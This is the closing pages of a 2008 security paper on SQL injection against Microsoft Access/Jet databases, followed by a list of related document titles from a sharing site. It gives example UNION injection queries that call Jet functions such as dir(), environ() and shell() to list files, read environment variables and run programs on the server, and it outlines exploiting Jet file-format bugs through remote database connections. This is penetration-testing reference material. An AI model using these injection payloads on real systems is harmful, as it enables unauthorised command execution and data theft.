23 8. Operating System Commands If sandboxing is DISABLED, or can be bypassed, then it is possible to use the following functions to execute operating system commands. CurDir[(drive)] Returns a Variant (String) representing the current path. Query: Select name from users where id ='1' union select curdir() from msysaccessobjects where '1'='1' Dir[(pathname [, attributes] )] Returns a String representing the name of a file, directory, or folder that matches a specified pattern or file attribute, or the volume label of a drive. Query: Select name from users where id ='1' union select dir('c:\ ') from msysaccessobjects where '1'='1' Environ( { envstring number } ) Returns the String associated with an operating system environment variable. Query: Select name from users where id ='1' union select environ(1) from msysaccessobjects where '1'='1' FileDateTime(pathname) Returns an Integer representing the attributes of a file, directory, or folder. Query: Select name from users where id ='1' union select filedatetime('c:\boot.ini') from msysaccessobjects where '1'='1' FileLen(pathname) Returns a Long specifying the length of a file in bytes Query: Select name from users where id ='1' union select filelen('c:\boot.ini') from msysaccessobjects where '1'='1' GetAttr(pathname) Returns an Integer representing the attributes of a file, directory, or folder. Query: Select name from users where id ='1' union select getattr('c:\ ') from msysaccessobjects where '1'='1' Shell(pathname [, windowstyle ] ) Runs an executable program and returns a Variant (Double) representing the program's task ID if successful, otherwise it returns zero. Query: Select name from users where id ='1' union select shell('<file to run>') from msysaccessobjects where '1'='1' 7 October 2008 Page 23 of 26
24 The file will be executed under the context of the server, usually the IIS anonymous user. This can prevent access to files such as cmd.exe on Windows 2003 and greater. If execute access is denied the following error will be returned. Microsoft JET Database Engine error '80040e14' Invalid procedure call 7 October 2008 Page 24 of 26
25 9. Non SQL MS Jet Exploitation MS Jet has had a number of vulnerabilities over the years. Some of these are in the SQL syntax and others, as mentioned in section 3.4 are related to the database file format. Despite Microsoft s reluctance to release security patches for the database format bugs, it appears that they have changed their mind and a patch is imminent. This section includes some scenarios where MS Jet vulnerabilities, specifically the file format ones, can be exploited through applications other than Microsoft Access itself. Microsoft IIS As is detailed in section 7, an SQL injection vulnerability can be used to request data from an external database. A lack of egress filtering could allow the web server to connect to an attacker controlled file, which was designed to exploit one of the file based vulnerabilities. OpenOffice.org The OpenOffice database application allows for connecting to an external database using ODBC or ADO. By specifying an ADO connection to a remote Access database file it is possible to exploit one of the file based vulnerabilities. If the target machine has MS Jet 3.5x installed, then an ADO connection string specifying the vulnerable versions of Jet can be used. Combining this with a query using the Shell() function, can lead to command execution. This type of exploitation affects any application that allows for the linking in or connecting to an Access based database. 7 October 2008 Page 25 of 26
26 10. References Advisory: NT ODBC Remote Compromise Access 12's new data engine Jet Expression Can Execute Unsafe Visual Basic for Applications Functions How to configure Jet 4.0 to prevent unsafe functions from running in Access 2000 and Access How to configure Jet 4.0 to prevent unsafe functions from running in Access Functions and properties in Access 2007 blocked by sandbox mode Use sandbox mode in Access Updated version of Microsoft Jet 3.5 available for download How to obtain the latest service pack for the Microsoft Jet 4.0 Database Engine How To Handle Quotes and Pipes in Concatenated SQL Literals How To Query for Literal Special Characters in a Where Clause List of reserved words in Jet Office System Driver: Data Connectivity Components EF94E038C891&displaylang=en MS Access Online Help Time-Based Blind SQL Injection with Heavy Queries MS Access SQL Injection Cheat Sheet 7 October 2008 Page 26 of 26
Ejemplos de manipulación de cadenas
Ejemplos de manipulación de cadenas Función Left MsgBox(Funciones_vb.Left(Cadena, 6)) MsgBox(Cadena.Substring(0, 6)) Función Right MsgBox(Funciones_vb.Right(Cadena, 6)) MsgBox(Cadena.Substring(Cadena.Length
1. General function and functionality of the malware
1. General function and functionality of the malware The malware executes in a command shell, it begins by checking to see if the executing file contains the MZP file extension, and then continues to access
Migrating helpdesk to a new server
Migrating helpdesk to a new server Table of Contents 1. Helpdesk Migration... 2 Configure Virtual Web on IIS 6 Windows 2003 Server:... 2 Role Services required on IIS 7 Windows 2008 / 2012 Server:... 2
Testing Web Applications for SQL Injection Sam Shober [email protected]
Testing Web Applications for SQL Injection Sam Shober [email protected] Abstract: This paper discusses the SQL injection vulnerability, its impact on web applications, methods for pre-deployment and
NNT CIS Microsoft SQL Server 2008R2 Database Engine Level 1 Benchmark Report 0514a
NNT CIS Microsoft SQL Server 2008R2 Database Engine Level 1 Benchmark Report 0514a: WIN- 2LR8M18J6A1 On WIN-2LR8M18J6A1 - By admin for time period 6/10/2014 8:59:44 AM to 6/10/2014 8:59:44 AM NNT CIS Microsoft
Access 2003 Macro Security Levels, Sandbox Mode, and Digitally Signed Files
Access 2003 Macro Security Levels, Sandbox Mode, and Digitally Signed Files Tim Gordon [email protected] Programming Plus (816) 333-7357 About dangerous code Dangerous code can consist of powerful
FREQUENTLY ASKED QUESTIONS
FREQUENTLY ASKED QUESTIONS Secure Bytes, October 2011 This document is confidential and for the use of a Secure Bytes client only. The information contained herein is the property of Secure Bytes and may
Teradata SQL Assistant Version 13.0 (.Net) Enhancements and Differences. Mike Dempsey
Teradata SQL Assistant Version 13.0 (.Net) Enhancements and Differences by Mike Dempsey Overview SQL Assistant 13.0 is an entirely new application that has been re-designed from the ground up. It has been
CHAPTER 23: USING ODBC
Chapter 23: Using ODBC CHAPTER 23: USING ODBC Training Objectives In this section, we introduce you to the Microsoft Business Solutions Navision NODBC driver. However, it is recommended that you read and
GP REPORTS VIEWER USER GUIDE
GP Reports Viewer Dynamics GP Reporting Made Easy GP REPORTS VIEWER USER GUIDE For Dynamics GP Version 2015 (Build 5) Dynamics GP Version 2013 (Build 14) Dynamics GP Version 2010 (Build 65) Last updated
User Guide. Version 3.2. Copyright 2002-2009 Snow Software AB. All rights reserved.
Version 3.2 User Guide Copyright 2002-2009 Snow Software AB. All rights reserved. This manual and computer program is protected by copyright law and international treaties. Unauthorized reproduction or
Abysssec Research. 1) Advisory information. 2) Vulnerable version
Abysssec Research 1) Advisory information Title Version Discovery Vendor Impact Contact Twitter CVE : Apple QuickTime FlashPix NumberOfTiles Remote Code Execution Vulnerability : QuickTime player 7.6.5
Nessus scanning on Windows Domain
Nessus scanning on Windows Domain A little inside information and Nessus can go a long way By Sunil Vakharia [email protected] Version 1.0 4 November 2003 About this paper This paper is not a tutorial
ODBC Driver Version 4 Manual
ODBC Driver Version 4 Manual Revision Date 12/05/2007 HanDBase is a Registered Trademark of DDH Software, Inc. All information contained in this manual and all software applications mentioned in this manual
Format string exploitation on windows Using Immunity Debugger / Python. By Abysssec Inc WwW.Abysssec.Com
Format string exploitation on windows Using Immunity Debugger / Python By Abysssec Inc WwW.Abysssec.Com For real beneficiary this post you should have few assembly knowledge and you should know about classic
Manipulating Microsoft SQL Server Using SQL Injection
Manipulating Microsoft SQL Server Using SQL Injection Author: Cesar Cerrudo ([email protected]) APPLICATION SECURITY, INC. WEB: E-MAIL: [email protected] TEL: 1-866-9APPSEC 1-212-947-8787 INTRODUCTION
KB303215 - Microsoft Network Security Hotfix Checker (Hfnetchk.exe) Tool Is Available
Page 1 of 8 Knowledge Base Microsoft Network Security Hotfix Checker (Hfnetchk.exe) Tool Is Available PSS ID Number: 303215 Article Last Modified on 3/2/2004 The information in this article applies to:
Knocker main application User manual
Knocker main application User manual Author: Jaroslav Tykal Application: Knocker.exe Document Main application Page 1/18 U Content: 1 START APPLICATION... 3 1.1 CONNECTION TO DATABASE... 3 1.2 MODULE DEFINITION...
Troubleshooting guide for 80004005 errors in Active Server Pages and Microsoft Data Access Components
Page 1 of 9 Troubleshooting guide for 80004005 errors in Active Server Pages and Microsoft Data Access Components This article was previously published under Q306518 On This Page SUMMARY MORE INFORMATION
Tips and Tricks SAGE ACCPAC INTELLIGENCE
Tips and Tricks SAGE ACCPAC INTELLIGENCE 1 Table of Contents Auto e-mailing reports... 4 Automatically Running Macros... 7 Creating new Macros from Excel... 8 Compact Metadata Functionality... 9 Copying,
Sync Exchange for MS Access Conduit for Windows Version 4 Manual
Sync Exchange for MS Access Conduit for Windows Version 4 Manual Revision Date 11/30/2007 HanDBase is a Registered Trademark of DDH Software, Inc. All information contained in this manual and all software
Mission 1: The Bot Hunter
Mission 1: The Bot Hunter Mission: Interpol have asked the BSidesLondon Unhackable Mission Force to penetrate and shut down a notorious botnet. Our only clue is a recovered bot executable which we hope
Siemens Applied Automation Page 1 11/26/03 9:57 PM. Maxum ODBC 3.11
Siemens Applied Automation Page 1 Maxum ODBC 3.11 Table of Contents Installing the Polyhedra ODBC driver... 2 Using ODBC with the Maxum Database... 2 Microsoft Access 2000 Example... 2 Access Example (Prior
Crystal Reports. Overview. Contents. Connecting the Report Designer Component to a Data Source
Connecting the Report Designer Component to a Data Source Overview Contents The Crystal Reports Report Designer Component (RDC) has a number of properties and methods available at runtime to connect a
Jet Data Manager 2012 User Guide
Jet Data Manager 2012 User Guide Welcome This documentation provides descriptions of the concepts and features of the Jet Data Manager and how to use with them. With the Jet Data Manager you can transform
Accessing Your Database with JMP 10 JMP Discovery Conference 2012 Brian Corcoran SAS Institute
Accessing Your Database with JMP 10 JMP Discovery Conference 2012 Brian Corcoran SAS Institute JMP provides a variety of mechanisms for interfacing to other products and getting data into JMP. The connection
for Networks Installation Guide for the application on the server July 2014 (GUIDE 2) Lucid Rapid Version 6.05-N and later
for Networks Installation Guide for the application on the server July 2014 (GUIDE 2) Lucid Rapid Version 6.05-N and later Copyright 2014, Lucid Innovations Limited. All Rights Reserved Lucid Research
Software Vulnerabilities
Software Vulnerabilities -- stack overflow Code based security Code based security discusses typical vulnerabilities made by programmers that can be exploited by miscreants Implementing safe software in
esrever gnireenigne tfosorcim seiranib
esrever gnireenigne tfosorcim seiranib Alexander Sotirov [email protected] CanSecWest / core06 Reverse Engineering Microsoft Binaries Alexander Sotirov [email protected] CanSecWest / core06 Overview
StruxureWare Power Monitoring 7.0.1
StruxureWare Power Monitoring 7.0.1 Installation Guide 7EN02-0308-01 07/2012 Contents Safety information 5 Introduction 7 Summary of topics in this guide 7 Supported operating systems and SQL Server editions
About This Service Fix... 1 New Features... 1 Defects Fixed... 1 Known Issues in Release 11.1.1.3... 3 Documentation Updates... 6
Oracle Essbase Integration Services Release 11.1.1.3 Readme [Skip Navigation Links] About This Service Fix... 1 New Features... 1 Defects Fixed... 1 Known Issues in Release 11.1.1.3... 3 Documentation
Webapps Vulnerability Report
Tuesday, May 1, 2012 Webapps Vulnerability Report Introduction This report provides detailed information of every vulnerability that was found and successfully exploited by CORE Impact Professional during
ODBC Client Driver Help. 2015 Kepware, Inc.
2015 Kepware, Inc. 2 Table of Contents Table of Contents 2 4 Overview 4 External Dependencies 4 Driver Setup 5 Data Source Settings 5 Data Source Setup 6 Data Source Access Methods 13 Fixed Table 14 Table
Advanced PostgreSQL SQL Injection and Filter Bypass Techniques
Advanced PostgreSQL SQL Injection and Filter Bypass Techniques INFIGO-TD TD-200 2009-04 2009-06 06-17 Leon Juranić [email protected] INFIGO IS. All rights reserved. This document contains information
ScriptLogic File System Auditor Agent Configuration Getting Started Guide
ScriptLogic File System Auditor Agent Configuration Getting Started Guide FILE SYSTEM AUDITOR II 2011 by ScriptLogic Corporation All rights reserved. This publication is protected by copyright and all
PRECISION v16.0 MSSQL Database. Installation Guide. Page 1 of 45
Installation Guide PRECISION v16.0 MSSQL Database Page 1 of 45 2015 Precision Software, a division of QAD Inc. Precision Software products are copyrighted and all rights are reserved by Precision Software,
"SQL Database Professional " module PRINTED MANUAL
"SQL Database Professional " module PRINTED MANUAL "SQL Database Professional " module All rights reserved. No parts of this work may be reproduced in any form or by any means - graphic, electronic, or
Two new DB2 Web Query options expand Microsoft integration As printed in the September 2009 edition of the IBM Systems Magazine
Answering the Call Two new DB2 Web Query options expand Microsoft integration As printed in the September 2009 edition of the IBM Systems Magazine Written by Robert Andrews [email protected] End-user
SQL Server An Overview
SQL Server An Overview SQL Server Microsoft SQL Server is designed to work effectively in a number of environments: As a two-tier or multi-tier client/server database system As a desktop database system
1. Building Testing Environment
The Practice of Web Application Penetration Testing 1. Building Testing Environment Intrusion of websites is illegal in many countries, so you cannot take other s web sites as your testing target. First,
Unix Security Technologies. Pete Markowsky <peterm[at] ccs.neu.edu>
Unix Security Technologies Pete Markowsky What is this about? The goal of this CPU/SWS are: Introduce you to classic vulnerabilities Get you to understand security advisories Make
National Fire Incident Reporting System (NFIRS 5.0) NFIRS Data Entry/Validation Tool Users Guide
National Fire Incident Reporting System (NFIRS 5.0) NFIRS Data Entry/Validation Tool Users Guide NFIRS 5.0 Software Version 5.3 Prepared for: Directorate of Preparedness and Response (FEMA) Prepared by:
FileMaker 11. ODBC and JDBC Guide
FileMaker 11 ODBC and JDBC Guide 2004 2010 FileMaker, Inc. All Rights Reserved. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker is a trademark of FileMaker, Inc. registered
DiskPulse DISK CHANGE MONITOR
DiskPulse DISK CHANGE MONITOR User Manual Version 7.9 Oct 2015 www.diskpulse.com [email protected] 1 1 DiskPulse Overview...3 2 DiskPulse Product Versions...5 3 Using Desktop Product Version...6 3.1 Product
MAS 500 Intelligence Tips and Tricks Booklet Vol. 1
MAS 500 Intelligence Tips and Tricks Booklet Vol. 1 1 Contents Accessing the Sage MAS Intelligence Reports... 3 Copying, Pasting and Renaming Reports... 4 To create a new report from an existing report...
INTRODUCTION: SQL SERVER ACCESS / LOGIN ACCOUNT INFO:
INTRODUCTION: You can extract data (i.e. the total cost report) directly from the Truck Tracker SQL Server database by using a 3 rd party data tools such as Excel or Crystal Reports. Basically any software
Fighting malware on your own
Fighting malware on your own Vitaliy Kamlyuk Senior Virus Analyst Kaspersky Lab [email protected] Why fight malware on your own? 5 reasons: 1. Touch 100% of protection yourself 2. Be prepared
Basic SQL Server operations
Basic SQL Server operations KB number History 22/05/2008 V1.0 By Thomas De Smet CONTENTS CONTENTS... 1 DESCRIPTION... 1 SOLUTION... 1 REQUIREMENTS...13 REFERENCES...13 APPLIES TO...13 KEYWORDS...13 DESCRIPTION
FileMaker 12. ODBC and JDBC Guide
FileMaker 12 ODBC and JDBC Guide 2004 2012 FileMaker, Inc. All Rights Reserved. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker and Bento are trademarks of FileMaker, Inc.
for Networks Installation Guide for the application on the server August 2014 (GUIDE 2) Lucid Exact Version 1.7-N and later
for Networks Installation Guide for the application on the server August 2014 (GUIDE 2) Lucid Exact Version 1.7-N and later Copyright 2014, Lucid Innovations Limited. All Rights Reserved Lucid Research
SPECIALIST PRACTICE MANAGER
INSTALLATION GUIDE FOR SPECIALIST PRACTICE MANAGER using a MICROSOFT SQL SERVER DATABASE Updated October 2009 All rights reserved. No reproduction, transmission, transcription, storage in a retrieval system,
EC-Council CAST CENTER FOR ADVANCED SECURITY TRAINING. CAST 619 Advanced SQLi Attacks and Countermeasures. Make The Difference CAST.
CENTER FOR ADVANCED SECURITY TRAINING 619 Advanced SQLi Attacks and Countermeasures Make The Difference About Center of Advanced Security Training () The rapidly evolving information security landscape
SQL injection: Not only AND 1=1. The OWASP Foundation. Bernardo Damele A. G. Penetration Tester Portcullis Computer Security Ltd
SQL injection: Not only AND 1=1 Bernardo Damele A. G. Penetration Tester Portcullis Computer Security Ltd [email protected] +44 7788962949 Copyright Bernardo Damele Assumpcao Guimaraes Permission
Portions of this product were created using LEADTOOLS 1991-2009 LEAD Technologies, Inc. ALL RIGHTS RESERVED.
Installation Guide Lenel OnGuard 2009 Installation Guide, product version 6.3. This guide is item number DOC-110, revision 1.038, May 2009 Copyright 1992-2009 Lenel Systems International, Inc. Information
Using Microsoft SQL Server A Brief Help Sheet for CMPT 354
Using Microsoft SQL Server A Brief Help Sheet for CMPT 354 1. Getting Started To Logon to Windows NT: (1) Press Ctrl+Alt+Delete. (2) Input your user id (the same as your Campus Network user id) and password
ReportByEmail ODBC Connection setup
ReportByEmail ODBC Connection setup Page 2 of 28 Content Introduction... 3 ReportByEmail Server and changing ODBC settings... 3 Microsoft AD Windows setup... 3 Important notice regarding 32-bit / 64-bit
Penetration Testing with Kali Linux
Penetration Testing with Kali Linux PWK Copyright 2014 Offensive Security Ltd. All rights reserved. Page 1 of 11 All rights reserved to Offensive Security, 2014 No part of this publication, in whole or
MS SQL Express installation and usage with PHMI projects
MS SQL Express installation and usage with PHMI projects Introduction This note describes the use of the Microsoft SQL Express 2008 database server in combination with Premium HMI projects running on Win31/64
Utilities. 2003... ComCash
Utilities ComCash Utilities All rights reserved. No parts of this work may be reproduced in any form or by any means - graphic, electronic, or mechanical, including photocopying, recording, taping, or
BLIND SQL INJECTION (UBC)
WaveFront Consulting Group BLIND SQL INJECTION (UBC) Rui Pereira,B.Sc.(Hons),CISSP,CIPS ISP,CISA,CWNA,CPTS/CPTE WaveFront Consulting Group Ltd [email protected] www.wavefrontcg.com 1 This material
Installing LearningBay Enterprise Part 2
Installing LearningBay Enterprise Part 2 Support Document Copyright 2012 Axiom. All Rights Reserved. Page 1 Please note that this document is one of three that details the process for installing LearningBay
VeriCentre 3.0 Upgrade Pre-Installation and Post Installation Guidelines
VeriCentre 3.0 Upgrade Pre-Installation and Post Installation Guidelines * For actual installation steps, please refer to the VeriCentre 3.0 Installation guide that came with the VeriCentre 3.0 software.
Chapter 4 Accessing Data
Chapter 4: Accessing Data 73 Chapter 4 Accessing Data The entire purpose of reporting is to make sense of data. Therefore, it is important to know how to access data locked away in the database. In this
Global Image Management System For epad-vision. User Manual Version 1.10
Global Image Management System For epad-vision User Manual Version 1.10 May 27, 2015 Global Image Management System www.epadlink.com 1 Contents 1. Introduction 3 2. Initial Setup Requirements 3 3. GIMS-Server
National Fire Incident Reporting System (NFIRS 5.0) Configuration Tool User's Guide
National Fire Incident Reporting System (NFIRS 5.0) Configuration Tool User's Guide NFIRS 5.0 Software Version 5.6 1/7/2009 Department of Homeland Security Federal Emergency Management Agency United States
Specifications of Paradox for Windows
Specifications of Paradox for Windows Appendix A 1 Specifications of Paradox for Windows A IN THIS CHAPTER Borland Database Engine (BDE) 000 Paradox Standard Table Specifications 000 Paradox 5 Table Specifications
Violating Database - Enforced Security Mechanisms
Violating Database - Enforced Security Mechanisms Runtime Patching Exploits in SQL Server 2000: a case study Chris Anley [[email protected]] 18/06/2002 An NGSSoftware Insight Security Research (NISR)
Oracle Essbase Integration Services. Readme. Release 9.3.3.0.00
Oracle Essbase Integration Services Release 9.3.3.0.00 Readme To view the most recent version of this Readme, see the 9.3.x documentation library on Oracle Technology Network (OTN) at http://www.oracle.com/technology/documentation/epm.html.
TROUBLESHOOTING GUIDE
TROUBLESHOOTING GUIDE (When using SQL Server 2008 R2) Third edition, (3 Dec 2013) This manual applies to these networked products: Lucid CoPS, Lucid Rapid, LASS 8-11, LASS 11-15 LADS, LADS Plus, Lucid
Web Application Disassembly with ODBC Error Messages By David Litchfield Director of Security Architecture @stake http://www.atstake.
Web Application Disassembly with ODBC Error Messages By David Litchfield Director of Security Architecture @stake http://www.atstake.com Introduction This document describes how to subvert the security
CAPIX Job Scheduler User Guide
CAPIX Job Scheduler User Guide Version 1.1 December 2009 Table of Contents Table of Contents... 2 Introduction... 3 CJS Installation... 5 Writing CJS VBA Functions... 7 CJS.EXE Command Line Parameters...
Silect Software s MP Author
Silect MP Author for Microsoft System Center Operations Manager Silect Software s MP Author User Guide September 2, 2015 Disclaimer The information in this document is furnished for informational use only,
Title: Bugger The Debugger - Pre Interaction Debugger Code Execution
White Paper Title: Bugger The Debugger Pre Interaction Debugger Code Execution Prepared by: Brett Moore Network Intrusion Specialist, CTO SecurityAssessment.com Date: April 2005 Abstract The use of debuggers
White Paper. Blindfolded SQL Injection
White Paper In the past few years, SQL Injection attacks have been on the rise. The increase in the number of Database based applications, combined with various publications that explain the problem and
Admin Report Kit for Active Directory
Admin Report Kit for Active Directory Reporting tool for Microsoft Active Directory Enterprise Product Overview Admin Report Kit for Active Directory (ARKAD) is a powerful reporting solution for the Microsoft
XMailer Reference Guide
XMailer Reference Guide Version 7.00 Wizcon Systems SAS Information in this document is subject to change without notice. SyTech assumes no responsibility for any errors or omissions that may be in this
Patch Manager. Overview. LabTech
Patch Manager PATCH MANAGER 1 Overview... 1 Using the Patch Manager... 7 Using the Patch Manager for Groups... 8 Ignoring Patches... 11 Denying Patches... 12 Removing Patch Approvals from Groups... 12
Microsoft Visual Studio Integration Guide
Microsoft Visual Studio Integration Guide MKS provides a number of integrations for Integrated Development Environments (IDEs). IDE integrations allow you to access MKS Integrity s workflow and configuration
PROJECTIONS SUITE. Database Setup Utility (and Prerequisites) Installation and General Instructions. v0.9 draft prepared by David Weinstein
PROJECTIONS SUITE Database Setup Utility (and Prerequisites) Installation and General Instructions v0.9 draft prepared by David Weinstein Introduction These are the instructions for installing, updating,
Architecting the Future of Big Data
Hive ODBC Driver User Guide Revised: July 22, 2013 2012-2013 Hortonworks Inc. All Rights Reserved. Parts of this Program and Documentation include proprietary software and content that is copyrighted and
Abysssec Research. 1) Advisory information. 2) Vulnerable version
Abysssec Research 1) Advisory information Title Version Analysis Vendor Impact Contact Twitter CVE : Microsoft MPEG Layer- 3 Audio Stack Based Overflow : l3codeca.acm (XP SP2 XP SP3) : http://www.abysssec.com
TS2Mascot. Introduction. System Requirements. Installation. Interactive Use
TS2Mascot Introduction TS2Mascot is a simple utility to export peak lists from an Applied Biosystems 4000 Series database. The peak list is saved as a Mascot Generic Format (MGF) file. This can be a file
Remote Management System
RMS Copyright and Distribution Notice November 2009 Copyright 2009 ARTROMICK International, Inc. ALL RIGHTS RESERVED. Published 2009. Printed in the United States of America WARNING: ANY UNAUTHORIZED
Automating client deployment
Automating client deployment 1 Copyright Datacastle Corporation 2014. All rights reserved. Datacastle is a registered trademark of Datacastle Corporation. Microsoft Windows is either a registered trademark
Exposed Database( SQL Server) Error messages Delicious food for Hackers
Exposed Database( SQL Server) Error messages Delicious food for Hackers The default.asp behavior of IIS server is to return a descriptive error message from the application. By attacking the web application
Troubleshooting BPMS Errors
BPMS SOFTWARE [email protected] 877-250-2698 Troubleshooting BPMS Errors Last Updated: 5 June 2015 Table of Contents ERROR #2501 THE OPENFORM ACTION WAS CANCELLED... 5 APPLIES TO... 5 SYMPTOMS... 5 CAUSE...
Voyager Reporting System (VRS) Installation Guide. Revised 5/09/06
Voyager Reporting System (VRS) Installation Guide Revised 5/09/06 System Requirements Verification 1. Verify that the workstation s Operating System is Windows 2000 or Higher. 2. Verify that Microsoft
Errors That Can Occur When You re Running a Report From Tigerpaw s SQL-based System (Version 9 and Above) Modified 10/2/2008
Errors That Can Occur When You re Running a Report From Tigerpaw s SQL-based System (Version 9 and Above) Modified 10/2/2008 1 Introduction The following is an explanation of some errors you might encounter
Fixes for CrossTec ResQDesk
Fixes for CrossTec ResQDesk Fixes in CrossTec ResQDesk 5.00.0006 December 2, 2014 Resolved issue where the list of Operators on Category was not saving correctly when adding multiple Operators. Fixed issue
SEER-HD Database Administrator s Guide
SEER-HD Database Administrator s Guide Rev. April 30, 2010-1 - Contents Introduction... 3 How SEER-HD Works... 4 Interaction of SEER-HD with Other SEER Programs... 5 Database Platforms... 6 Getting Started...
Thick Client Application Security
Thick Client Application Security Arindam Mandal ([email protected]) (http://www.paladion.net) January 2005 This paper discusses the critical vulnerabilities and corresponding risks in a two
Creating a universe on Hive with Hortonworks HDP 2.0
Creating a universe on Hive with Hortonworks HDP 2.0 Learn how to create an SAP BusinessObjects Universe on top of Apache Hive 2 using the Hortonworks HDP 2.0 distribution Author(s): Company: Ajay Singh
RTI Database Integration Service. Release Notes
RTI Database Integration Service Release Notes Version 5.2.0 2015 Real-Time Innovations, Inc. All rights reserved. Printed in U.S.A. First printing. June 2015. Trademarks Real-Time Innovations, RTI, NDDS,
National Fire Incident Reporting System (NFIRS 5.0) NFIRS Data Entry/Validation Tool Users Guide
National Fire Incident Reporting System (NFIRS 5.0) NFIRS Data Entry/Validation Tool Users Guide NFIRS 5.0 Software Version 5.6 1/7/2009 Department of Homeland Security Federal Emergency Management Agency
SAP Business Objects Business Intelligence platform Document Version: 4.1 Support Package 7 2015-11-24. Data Federation Administration Tool Guide
SAP Business Objects Business Intelligence platform Document Version: 4.1 Support Package 7 2015-11-24 Data Federation Administration Tool Guide Content 1 What's new in the.... 5 2 Introduction to administration
Matisse Installation Guide for MS Windows. 10th Edition
Matisse Installation Guide for MS Windows 10th Edition April 2004 Matisse Installation Guide for MS Windows Copyright 1992 2004 Matisse Software Inc. All Rights Reserved. Matisse Software Inc. 433 Airport
Remark FTP Utility. For Remark Office OMR. User s Guide
Remark FTP Utility For Remark Office OMR User s Guide Remark Products Group 301 Lindenwood Drive, Suite 100 Malvern, PA 19355-1772 USA www.gravic.com Disclaimer The information contained in this document
Patch Management Table of Contents:
Table of Contents: Manage Machines Manage Updates Patch Policy Configure Patch Parameters 153 Chapter 5 - Sadjadi et al. Introduction As new operating system and software updates are released in an ever
Outlook Add-in Deployment Guide
Outlook Add-in Deployment Guide Sophos TOC 3 Contents Introduction...4 Prerequisites...4 Installation...4 Downloading the Outlook Add-in...5 Installing the Add-in on a Single Workstation...5 Installing
